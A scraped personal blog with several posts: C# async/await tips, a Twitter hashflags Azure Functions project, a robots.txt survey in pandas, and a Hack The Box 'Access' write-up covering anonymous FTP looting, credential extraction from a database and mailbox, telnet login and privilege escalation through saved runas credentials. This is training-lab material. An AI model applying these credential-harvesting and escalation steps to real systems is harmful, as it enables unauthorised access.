7 tips for converting C# code to async/await

Over the past year I’ve moved from working mainly in Java, to working mainly in C#. To be honest, Java and C# have more in common than not, but one of the major differences is async/await. It’s a really powerful tool if used correctly, but also a very quick way to shoot yourself in the foot.

Asynchronous programming looks very similar to synchronous programming. However, there are some core concepts which need to be understood in order to form a proper mental model when converting between synchronous and asynchronous programming patterns.

Here are some of the most common ones I’ve come across.


Method names must use the suffix Async when returning a Task or Task<T>. Consistency is key as the Async suffix provides not only a mental signal to the caller that the await keyword should be used, but also provides a consistent naming convention.

Return types

Every async method returns a Task. Use Task when there is no specific result for the method, which is synonymous with void. Use Task<T> when a return value is required.


There is not a way for the compiler to manage ref and out parameters. (That’s a topic for another time.) When multiple values need to be returned you should either use custom objects or a Tuple.


Following up on the lack of the void return type, no async method should be defined as an Action variant. When accepting a delegate to an asynchronous method, the asynchronous pattern should be propagated by accepting Func<Task> or Func<Task<T>>.

Virtual methods

In asynchronous programming there is no concept of a void return type, as the basis of the model is that each method returns a mechanism for signalling completion of the asynchronous work. When converting base classes which have empty implementations or return constant values, the framework provides methods and helpers to facilitate the pattern.


Like delegates, interfaces should always be declared async which ensures an async-aware model throughout the stack.


In certain cases, mostly unit test mocks, you may find the need to implement interfaces without having any reason to actually perform any asynchronous calls. In these specific cases it is OK to feign asynchronous execution using Task.CompletedTask or Task.FromResult<T>(T result).


Overall asynchronous programming is much better for performance, but requires a slightly different mental model. I hope these tips help!

Automated Dependency Updates

At CopenhagenJS in August I was able to share my work on Renovate—a universal dependency update tool—and how you can use it to save time and improve security in software projects.

If you want to find out more about Renovate you can find us on GitHub.

Access: Hack The Box writeup

Access info page

Recently I discovered Hack The Box, an online platform to hone your cyber security skills by practising on vulnerable VMs. The first box I solved is called Access. In this blog post I’ll walk through how I solved it. If you don’t want any spoilers, look away now!

Information gathering

Let’s start with an nmap scan to see what services are running on the box.

# nmap -n -v -Pn -p- -A --reason -oN nmap.txt
21/tcp open  ftp     syn-ack Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst:
|_  SYST: Windows_NT
23/tcp open  telnet  syn-ack Microsoft Windows XP telnetd (no more connections allowed)
80/tcp open  http    syn-ack Microsoft IIS httpd 7.5
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: MegaCorp

nmap has found three services running: FTP, telnet, and an HTTP server. Let’s see what’s running on the HTTP server.

It’s just a static page, showing an image. Nothing interesting, so let’s move on for now.

Anonymous FTP

nmap showed that there is an FTP server running, with anonymous login allowed. Let’s see what’s on that server

# ftp
Connected to
220 Microsoft FTP Service
Name ( anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18  08:16PM       <DIR>          Backups
08-24-18  09:00PM       <DIR>          Engineer
226 Transfer complete.
ftp> ls Backups
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-23-18  08:16PM              5652480 backup.mdb
226 Transfer complete.
ftp> ls Engineer
200 PORT command successful.
125 Data connection already open; Transfer starting.
08-24-18  12:16AM                10870 Access Control.zip
226 Transfer complete.

There are some interesting files here, let’s download them and analyse them

# wget ftp://anonymous:[email protected] --no-passive-ftp --mirror
--2019-02-02 15:37:26--  ftp://anonymous:*password*@
           => ‘’
Connecting to connected.
Logging in as anonymous ... Logged in!
FINISHED --2019-02-02 15:37:28--
Total wall clock time: 1.8s
Downloaded: 5 files, 5.4M in 1.4s (3.99 MB/s)

Microsoft Access

We’ve got a .mdb file—which is a Microsoft Access database file—and a zip file. If we take a quick look at the zip file it’s password protected. We’ll have to come back the that later.

We can examine backup.mdb using MDB tools. Maybe there’s something we can use there.

# mdb-tables Backups/backup.mdb
acc_antiback acc_door acc_firstopen acc_firstopen_emp acc_holidays acc_interlock acc_levelset acc_levelset_door_group acc_linkageio acc_map acc_mapdoorpos acc_morecardempgroup acc_morecardgroup acc_timeseg acc_wiegandfmt ACGroup acholiday ACTimeZones action_log AlarmLog areaadmin att_attreport att_waitforprocessdata attcalclog attexception AuditedExc auth_group_permissions auth_message auth_permission auth_user auth_user_groups auth_user_user_permissions base_additiondata base_appoption base_basecode base_datatranslation base_operatortemplate base_personaloption base_strresource base_strtranslation base_systemoption CHECKEXACT CHECKINOUT dbbackuplog DEPARTMENTS deptadmin DeptUsedSchs devcmds devcmds_bak django_content_type django_session EmOpLog empitemdefine EXCNOTES FaceTemp iclock_dstime iclock_oplog iclock_testdata iclock_testdata_admin_area iclock_testdata_admin_dept LeaveClass LeaveClass1 Machines NUM_RUN NUM_RUN_DEIL operatecmds personnel_area personnel_cardtype personnel_empchange personnel_leavelog ReportItem SchClass SECURITYDETAILS ServerLog SHIFT TBKEY TBSMSALLOT TBSMSINFO TEMPLATE USER_OF_RUN USER_SPEDAY UserACMachines UserACPrivilege USERINFO userinfo_attarea UsersMachines UserUpdates worktable_groupmsg worktable_instantmsg worktable_msgtype worktable_usrmsg ZKAttendanceMonthStatistics acc_levelset_emp acc_morecardset ACUnlockComb AttParam auth_group AUTHDEVICE base_option dbapp_viewmodel FingerVein devlog HOLIDAYS personnel_issuecard SystemLog USER_TEMP_SCH UserUsedSClasses acc_monitor_log OfflinePermitGroups OfflinePermitUsers OfflinePermitDoors LossCard TmpPermitGroups TmpPermitUsers TmpPermitDoors ParamSet acc_reader acc_auxiliary STD_WiegandFmt CustomReport ReportField BioTemplate FaceTempEx FingerVeinEx TEMPLATEEx

It looks like there’s a lot of autogenerated tables here, but those auth_* tables look interesting.

# mdb-export Backups/backup.mdb auth_user
25,"admin","admin",1,"08/23/18 21:11:47",26,
27,"engineer","[email protected]",1,"08/23/18 21:13:36",26,
28,"backup_admin","admin",1,"08/23/18 21:14:02",26,

Awesome! So we’ve got some credentials for engineer, and we’ve got a password protected zip file in the Engineer directory.

Microsoft Outlook

# 7z x Access\ Control.zip

7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_GB.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs Intel(R) Core(TM) i7-7820HQ CPU @ 2.90GHz (906E9),ASM,AES-NI)

Scanning the drive for archives:
1 file, 10870 bytes (11 KiB)

Extracting archive: Access Control.zip
Path = Access Control.zip
Type = zip
Physical Size = 10870

Enter password (will not be echoed):
Everything is Ok

Size:       271360
Compressed: 10870

# ls
'Access Control.pst'  'Access Control.zip'

That worked! Now we’ve got the mailbox backup for the engineer, but we first need to convert it to something that we can read more easily on Linux.

# readpst Access\ Control.pst
Opening PST file and indexes...
Processing Folder "Deleted Items"
	"Access Control" - 2 items done, 0 items skipped.

Let’s take a peek at the engineer’s mailbox

# mail -f Access\ Control.mbox
mail version v14.9.11.  Type `?' for help
'/root/ Control.mbox': 1 message
▸O  1 [email protected]  2018-08-23 23:44   87/3112  MegaCorp Access Control System "security" account
[-- Message  1 -- 87 lines, 3112 bytes --]:
From "[email protected]" Thu Aug 23 23:44:07 2018
From: [email protected] <[email protected]>
Subject: MegaCorp Access Control System "security" account
To: '[email protected]'
Date: Thu, 23 Aug 2018 23:44:07 +0000

[-- #1.1 73/2670 multipart/alternative --]

[-- #1.1.1 15/211 text/plain, 7bit, utf-8 --]

Hi there,

The password for the “security” account has been changed to 4Cc3ssC0ntr0ller.  Please ensure this is pass
ed on to your engineers.



[-- #1.1.2 51/2211 text/html, 7bit, us-ascii --]

Another set of credentials! I wonder what these are used for? Let’s try FTP first

# ftp
Connected to
220 Microsoft FTP Service
Name ( security
331 Password required for security.
530 User cannot log in.
ftp: Login failed.

No dice ☹. The only other option is telnet.


# telnet
Connected to
Escape character is '^]'.
Welcome to Microsoft Telnet Service

login: security

Microsoft Telnet Server.

We’re in! The user.txt should be located on security's Desktop

 Volume in drive C has no label.
 Volume Serial Number is 9C45-DBF0

 Directory of C:\Users\security

02/02/2019  03:56 PM    <DIR>          .
02/02/2019  03:56 PM    <DIR>          ..
08/24/2018  07:37 PM    <DIR>          .yawcam
08/21/2018  10:35 PM    <DIR>          Contacts
08/28/2018  06:51 AM    <DIR>          Desktop
08/21/2018  10:35 PM    <DIR>          Documents
08/21/2018  10:35 PM    <DIR>          Downloads
08/21/2018  10:35 PM    <DIR>          Favorites
08/21/2018  10:35 PM    <DIR>          Links
08/21/2018  10:35 PM    <DIR>          Music
08/21/2018  10:35 PM    <DIR>          Pictures
08/21/2018  10:35 PM    <DIR>          Saved Games
08/21/2018  10:35 PM    <DIR>          Searches
08/24/2018  07:39 PM    <DIR>          Videos
               1 File(s)        964,179 bytes
              14 Dir(s)  16,745,127,936 bytes free

C:\Users\security>cd Desktop

 Volume in drive C has no label.
 Volume Serial Number is 9C45-DBF0

 Directory of C:\Users\security\Desktop

08/28/2018  06:51 AM    <DIR>          .
08/28/2018  06:51 AM    <DIR>          ..
08/21/2018  10:37 PM                32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)  16,744,726,528 bytes free

C:\Users\security\Desktop>more user.txt

Privilege escalation

Now that we’ve got the first flag, we need to escalate to root access—or more specifically Administrator on Windows.

The .yawcam directory looks out of the ordinary.

dir .yawcam
 Volume in drive C has no label.
 Volume Serial Number is 9C45-DBF0

 Directory of C:\Users\security\.yawcam

08/24/2018  07:37 PM    <DIR>          .
08/24/2018  07:37 PM    <DIR>          ..
08/23/2018  10:52 PM    <DIR>          2
08/22/2018  06:49 AM                 0 banlist.dat
08/23/2018  10:52 PM    <DIR>          extravars
08/22/2018  06:49 AM    <DIR>          img
08/23/2018  10:52 PM    <DIR>          logs
08/22/2018  06:49 AM    <DIR>          motion
08/22/2018  06:49 AM                 0 pass.dat
08/23/2018  10:52 PM    <DIR>          stream
08/23/2018  10:52 PM    <DIR>          tmp
08/23/2018  10:34 PM                82 ver.dat
08/23/2018  10:52 PM    <DIR>          www
08/24/2018  07:37 PM             1,411 yawcam_settings.xml
               4 File(s)          1,493 bytes
              10 Dir(s)  16,764,841,984 bytes free

However poking around in there proved fruitless. Maybe there’s a way to use this, but I couldn’t figure anything out.

Let’s keep looking

C:\Users\security>cd ../

 Volume in drive C has no label.
 Volume Serial Number is 9C45-DBF0

 Directory of C:\Users

02/02/2019  04:15 PM    <DIR>          .
02/02/2019  04:15 PM    <DIR>          ..
08/23/2018  11:46 PM    <DIR>          Administrator
02/02/2019  04:15 PM    <DIR>          engineer
02/02/2019  04:14 PM    <DIR>          Public
02/02/2019  04:16 PM    <DIR>          security
               0 File(s)              0 bytes
               6 Dir(s)  16,754,778,112 bytes free

Maybe one of the other users has something interesting we can use?

C:\Users>cd engineer
Access is denied.

I didn’t really expect that to work anyway

C:\Users>cd Public

 Volume in drive C has no label.
 Volume Serial Number is 9C45-DBF0

 Directory of C:\Users\Public

02/02/2019  04:14 PM    <DIR>          .
02/02/2019  04:14 PM    <DIR>          ..
07/14/2009  05:06 AM    <DIR>          Documents
07/14/2009  04:57 AM    <DIR>          Downloads
07/14/2009  04:57 AM    <DIR>          Music
07/14/2009  04:57 AM    <DIR>          Pictures
07/14/2009  04:57 AM    <DIR>          Videos
               1 File(s)        964,179 bytes
               7 Dir(s)  16,723,468,288 bytes free

Wait a minute, we’re missing some of the standard Windows directories. Let’s have a closer look.

C:\Users\Public>dir /A
 Volume in drive C has no label.
 Volume Serial Number is 9C45-DBF0

 Directory of C:\Users\Public

02/02/2019  04:14 PM    <DIR>          .
02/02/2019  04:14 PM    <DIR>          ..
08/28/2018  06:51 AM    <DIR>          Desktop
07/14/2009  04:57 AM               174 desktop.ini
07/14/2009  05:06 AM    <DIR>          Documents
07/14/2009  04:57 AM    <DIR>          Downloads
07/14/2009  02:34 AM    <DIR>          Favorites
07/14/2009  04:57 AM    <DIR>          Libraries
07/14/2009  04:57 AM    <DIR>          Music
07/14/2009  04:57 AM    <DIR>          Pictures
07/14/2009  04:57 AM    <DIR>          Videos
               2 File(s)        964,353 bytes
              10 Dir(s)  16,717,438,976 bytes free

Desktop has a much more recent modification date than everything else

C:\Users\Public>cd Desktop

 Volume in drive C has no label.
 Volume Serial Number is 9C45-DBF0

 Directory of C:\Users\Public\Desktop

08/22/2018  09:18 PM             1,870 ZKAccess3.5 Security System.lnk
               1 File(s)          1,870 bytes
               0 Dir(s)  16,711,475,200 bytes free

That’s because there’s a shortcut there.

Now, I’m not sure of the best way to view a .lnk on cmd.exe via telnet, but this is what I came up with. If anyone knows of a better way, please let me know!

C:\Users\Public\Desktop>type "ZKAccess3.5 Security System.lnk"
LF@ ��7���7���#�P/P�O� �:i�+00�/C:\R1M�:Windows��:��M�:*wWindowsV1MV�System32��:��MV�*�System32X2P�:�
                                                                                                        runas.exe��:1��:1*Yrunas.exeL-K��EC:\Windows\System32\runas.exe#..\..\..\Windows\System32\runas.exeC:\ZKTeco\ZKAccess3.5G/user:ACCESS\Administrator /savecred "C:\ZKTeco\ZKAccess3.5\Access.exe"'C:\ZKTeco\ZKAccess3.5\img\AccessNET.ico�%SystemDrive%\ZKTeco\ZKAccess3.5\img\AccessNET.ico%SystemDrive%\ZKTeco\ZKAccess3.5\img\AccessNET.ico�%�
                                                                                         )ΰ[	��1SPSXFL8C���&me*S-1-5-21-953262931-566350628-63446256-500

It’s a bit difficult to read, but it looks like the shortcut runs a program as the Administrator using saved credentials. We can use that.

C:\Users\Public\Desktop>runas /user:Administrator /savecred "cmd.exe /c more C:\Users\Administrator\Desktop\root.txt > C:\Users\Public\Desktop\output.txt"

Did it work?

C:\Users\Public\Desktop>more output.txt

Yes! From there we could generate a reverse shell using msfvenom and run that as Administrator, but I’ve got the flag so I’ll leave it there for now.

Twitter Hashflags (Hash-what?)

Have you ever tweeted out a hastag, and discovered a small image attached to the side of it? It could be for #StPatricksDay, #MarchForOurLives, or whatever #白白白白白白白白白白 is meant to be. These are hashflags.

A hashflag, sometimes called Twitter emoji, is a small image that appears after a #hashtag for special events. They are not regular emoji, and you can only use them on the Twitter website, or the official Twitter apps. For example:

If you’re a company, and you have enough money, you can buy your own hashflag as well! That’s exactly what Disney did for the release of Star Wars: The Last Jedi.

If you spend the money to buy a hashflag, it’s important that you launch it correctly—otherwise they can flop. #白白白白白白白白白白 is an example of what not to do. At time of writing, it has only 10 uses.

Hashflags aren’t exclusive to English, and they can help add context to a tweet in another language. I don’t speak any Russian, but I do know that this image is of BB-8!

Unfortunately hashflags are temporary, so any context they add to a tweet can sometimes be lost at a later date. Currently Twitter doesn’t provide an official API for hashflags, and there is no canonical list of currently active hashflags. @hashflaglist tracks hashflags, but it’s easy to miss one—this is where Azure Functions come in.

It turns out that on Twitter.com the list of currently active hashflags is sent as a JSON object in the HTML as initial data. All I need to do is fetch Twitter.com, and extract the JSON object from the HTML.

$ curl https://twitter.com -v --silent 2>&1 | grep -o -P '.{6}activeHashflags.{6}'


I wrote some C# to parse and extract the activeHashflags JSON object, and store it in an Azure blob. You can find it here. Using Azure Functions I can run this code on a timer, so the Azure blob is always up to date with the latest Twitter hashflags. This means the blob can be used as an unofficial Twitter hashflags API—but I didn’t want to stop there.

I wanted to solve some of the issues with hashflags around both discovery and durability. Azure Functions is the perfect platform for these small, single purpose pieces of code. I ended up writing five Azure Functions in total—all of which can be found on GitHub.

Screenshot of hashflags-function GitHub page

  1. ActiveHashflags fetches the active hashflags from Twitter, and stores them in a JSON object in an Azure Storage Blob. You can find the list of current hashflags here.
  2. UpdateHashflagState reads the JSON, and updates the hashflag table with the current state of each hashflag.
  3. StoreHashflagImage downloads the hashflag image, and stores it in a blob store.
  4. CreateHeroImage creates a hero image of the hashtag and hashflag.
  5. TweetHashflag tweets the hashtag and hero image.

Say hello to @HashflagArchive!

Screenshot of HashflagArchive Twitter stream

@HashflagArchive solves both the issues I have with hashflags: it tweets out new hashflags the same hour they are activated on twitter, which solves the issue of discovery; and it tweets an image of the hashtag and hashflag, which solves the issue of hashflags being temporary.

So this is great, but there’s still one issue—how to use hashflags outside of Twitter.com and the official Twitter apps. This is where the JSON blob comes in. I can build a wrapper library around that, and then using that library, build applications with Twitter hashflags. So that’s exactly what I did.

Screenshot of hashflags-node GitHub page

I wrote an npm package called hashflags. It’s pretty simple to use, and integrates nicely with the official twitter-text npm package.

import { Hashflags } from 'hashflags';

let hf: Hashflags;
Hashflags.FETCH().then((val: Map<string, string>) => {
  hf = new Hashflags(val);

I wrote it in TypeScript, but it can also be used from plain old JS as well.

const Hashflags = require('hashflags').Hashflags;

let hf;
Hashflags.FETCH().then(val => {
  hf = new Hashflags(val);

So there you have it, a quick introduction to Twitter hashflags via Azure Functions and an npm library. If you’ve got any questions please leave a comment below, or reach out to me on Twitter @Jamie_Magee.

A survey of robots.txt - part two

In part one of this article, I collected robots.txt from the top 1 million sites on the web. In this article I’m going to do some analysis, and see if there’s anything interesting to find from all the files I’ve collected.

First we’ll start with some setup.

%matplotlib inline

import pandas as pd
import numpy as np
import glob
import os
import matplotlib

Next I’m going to load the content of each file into my pandas dataframe, calculate the file size, and store that for later.

l = [filename.split('/')[1] for filename in glob.glob('robots-txt/\*')]
df = pd.DataFrame(l, columns=['domain'])
df['content'] = df.apply(lambda x: open('robots-txt/' + x['domain']).read(), axis=1)
df['size'] = df.apply(lambda x: os.path.getsize('robots-txt/' + x['domain']), axis=1)
612419veapple.comUser-agent: *\nAllow: /\n\nSitemap: http://www...260
622296buscadortransportes.comUser-agent: *\nDisallow: /out/29
147795dailynews360.comUser-agent: *\nAllow: /\n\nDisallow: /search/\...248
72823newfoundlandpower.comUser-agent: *\nDisallow: /Search.aspx\nDisallo...528
601408xfwed.com#\n# robots.txt for www.xfwed.com\n# Version 3...201

File sizes

Now that we’ve done the setup, let’s see what the spread of file sizes in robots.txt is.

fig = df.plot.hist(title='robots.txt file size', bins=20)


It looks like the majority of robots.txt are under 250KB in size. This is really no surprise as robots.txt supports regex, so complex rulesets can be built easily.

Let’s take a look at the files larger than 1MB. I can think of three possibilities: they’re automatically maintained; they’re some other file masquerading as robots.txt; or the site is doing something seriously wrong.

large = df[df['size'] > 10 ** 6].sort_values(by='size', ascending=False)
import re

def count_directives(value, domain):
content = domain['content']
return len(re.findall(value, content, re.IGNORECASE))

large['disallow'] = large.apply(lambda x: count_directives('Disallow', x), axis=1)
large['user-agent'] = large.apply(lambda x: count_directives('User-agent', x), axis=1)
large['comments'] = large.apply(lambda x: count_directives('#', x), axis=1)

# The directives below are non-standard

large['crawl-delay'] = large.apply(lambda x: count_directives('Crawl-delay', x), axis=1)
large['allow'] = large.apply(lambda x: count_directives('Allow', x), axis=1)
large['sitemap'] = large.apply(lambda x: count_directives('Sitemap', x), axis=1)
large['host'] = large.apply(lambda x: count_directives('Host', x), axis=1)

632170haberborsa.com.trUser-agent: *\nAllow: /\n\nDisallow: /?ref=\nD...58203507124420071245510
23216miradavetiye.comSitemap: https://www.miradavetiye.com/sitemap_...5028384470267004702620
282904americanrvcompany.comSitemap: http://www.americanrvcompany.com/site...4904266568461105685220
446326exibart.comUser-Agent: *\nAllow: /\nDisallow: /notizia.as...3275088614031006140400
55309vibralia.com# robots.txt automaticaly generated by PrestaS...28355523971211503973600
124850oftalmolog30.ruUser-Agent: *\nHost: chuzmsch.ru\nSitemap: htt...2831975877521008775222
677400bigclozet.comUser-agent: *\nDisallow: /item/\n\nUser-agent:...2708717512214005122100
621834tranzilla.ruHost: tranzilla.ru\nSitemap: http://tranzilla....2133091276471002764821
428735autobaraholka.comUser-Agent: *\nDisallow: /registration/\nDisal...1756983393301003933002
628591megasmokers.ruUser-agent: *\nDisallow: /*route=account/\nDis...1633963922009221
647336valencia-cityguide.com# If the Joomla site is installed within a fol...155908617719112017719199
663372vetality.fr# robots.txt automaticaly generated by PrestaS...15367582773711202773700
105735golden-bee.ruUser-agent: Yandex\nDisallow: /*_openstat\nDis...1139308240814102408101
454311dreamitalive.comuser-agent: google\ndisallow: /memberprofileda...1116416343923003440109
245895gobankingrates.comUser-agent: *\nDisallow: /wp-admin/\nAllow: /w...1018109736228202736300

It looks like all of these sites are misusing Disallow and Allow. In fact, looking at the raw files it appears as if they list all of the articles on the site under an individual Disallow command. I can only guess that when publishing an article, a corresponding line in robots.txt is added.

Now let’s take a look at the smallest robots.txt

small = df[df['size'] > 0].sort_values(by='size', ascending=True)


There’s not really anything interesting here, so let’s take a look at some larger files

small = df[df['size'] > 10].sort_values(by='size', ascending=True)

329775klue.krDisallow: /11
390064chneic.sh.cnDisallow: /11
355604hpi-mdf.comDisallow: /11

Disallow: / tells all webcrawlers not to crawl anything on this site, and should (hopefully) keep it out of any search engines, but not all webcrawlers follow robots.txt.

User agents

User agents can be listed in robots.txt to either Allow or Disallow certain paths. Let’s take a look at the most common webcrawlers.

from collections import Counter

def find_user_agents(content):
    return re.findall('User-agent:? (.*)', content)

user_agent_list = [find_user_agents(x) for x in df['content']]
user_agent_count = Counter(x.strip() for xs in user_agent_list for x in set(xs))
[('*', 587729),
('Mediapartners-Google', 36654),
('Yandex', 29065),
('Googlebot', 25932),
('MJ12bot', 22250),
('Googlebot-Image', 16680),
('Baiduspider', 13646),
('ia_archiver', 13592),
('Nutch', 11204),
('AhrefsBot', 11108)]

It’s no surprise that the top result is a wildcard (*). Google takes spots 2, 4, and 6 with their AdSense, search and image web crawlers respectively. It does seem a little strange to see the AdSense bot listed above the usual search web crawler. Some of the other large search engines’ bots are also found in the top 10: Yandex, Baidu, and Yahoo (Slurp). MJ12bot is a crawler I had not heard of before, but according to their site it belongs to a UK based SEO company—and according to some of the results about it, it doesn’t behave very well. ia_archiver belongs to The Internet Archive, and (I assume) crawls pages for the Wayback Machine. Finally there is Apache Nutch, an open source webcrawler that can be run by anyone.

Security by obscurity

There are certain paths that you might not want a webcrawler to know about. For example, a .git directory, htpasswd files, or parts of a site that are still in testing, and aren’t meant to be found by anyone on Google. Let’s see if there’s anything interesting.

sec_obs = ['\.git', 'alpha', 'beta', 'secret', 'htpasswd', 'install\.php', 'setup\.php']
sec_obs_regex = re.compile('|'.join(sec_obs))

def find_security_by_obscurity(content):
return sec_obs_regex.findall(content)

sec_obs_list = [find_security_by_obscurity(x) for x in df['content']]
sec_obs_count = Counter(x.strip() for xs in sec_obs_list for x in set(xs))
[('install.php', 28925),
('beta', 2834),
('secret', 753),
('alpha', 597),
('.git', 436),
('setup.php', 73),
('htpasswd', 45)]

Just because a file or directory is mentioned in robots.txt, it doesn’t mean that it can actually be accessed. However, if even 1% of Wordpress installs leave their install.php open to the world, that’s still a lot of vulnerable sites. Any attacker could get the keys to the kingdom very easily. The same goes for a .git directory. Even if it is read-only, people accidentally commit secrets to their git repository all the time.


robots.txt is a fairly innocuous part of the web. It’s been interesting to see how popular websites (ab)use it, and which web crawlers are naughty or nice. Most of all this has been a great exercise for myself in collecting data and analysing it using pandas and Jupyter.

The full data set is released under the Open Database License (ODbL) v1.0 and can be found on GitHub